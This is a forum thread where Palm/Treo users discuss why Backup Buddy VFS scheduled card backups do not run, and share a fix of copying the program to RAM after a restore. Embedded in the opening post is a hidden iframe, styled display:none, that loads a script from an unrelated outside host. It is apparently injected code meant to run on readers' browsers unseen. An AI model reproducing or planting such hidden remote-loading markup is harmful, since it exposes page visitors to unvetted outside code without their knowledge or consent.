+ Reply to Thread

Backup Buddy VFS Scheduled Backups

Has anyone else tried using this feature. I select at a certain time to backup my info onto my card but when I go into check it shows the last time I manually kicked off the process.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Backup Buddy VFS Scheduled Backups

Originally posted by pdageek
    Has anyone else tried using this feature. I select at a certain time to backup my info onto my card but when I go into check it shows the last time I manually kicked off the process.

Works for me. 3:00 am every morning. I have upgraded from the free version, but it was working for several days with the free version before I upgraded.

Alan

3 AM for me also. Use Filez or a similar pgm to check the properties of the backed up files. You'll see more accurately if it worked.

If you've got it to backup at 3am the BB screen should indicate Last Backup: 2/11/03 3:00am correct?

AutoSync is set to sync at 9:00AM and it works like a charm its just the card backup that doesn't appear to be working.

@pdageek
    Yes but Filez doesn't do it for files on the card (sorry). I use McFile (properties) and it shows new "DateCreated" & "DateAccessed" which is the date/time of the last backup. The "DateModified" will be the first backup date.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

After a restore BB doesn't always copy BB VFS to the RAM which results in the scheduled feature not working. Once I copied it from my card to the RAM it worked fine. Found the FAQ on their site.

I have autosync schduled to kick in at 9am each day and BB VFS scheduled at 4pm.

Now that I feel safe I'll probably drop it on the icy pavement tonight. :anger

Hey mine is at 3am every night too! It's like all our 7135s are having a party while we sleep!!!
    :drink1 :drink3 :drink2 :beer :jump3 :Smoke:
    ~'kito
    pdaPhoneHome Moderator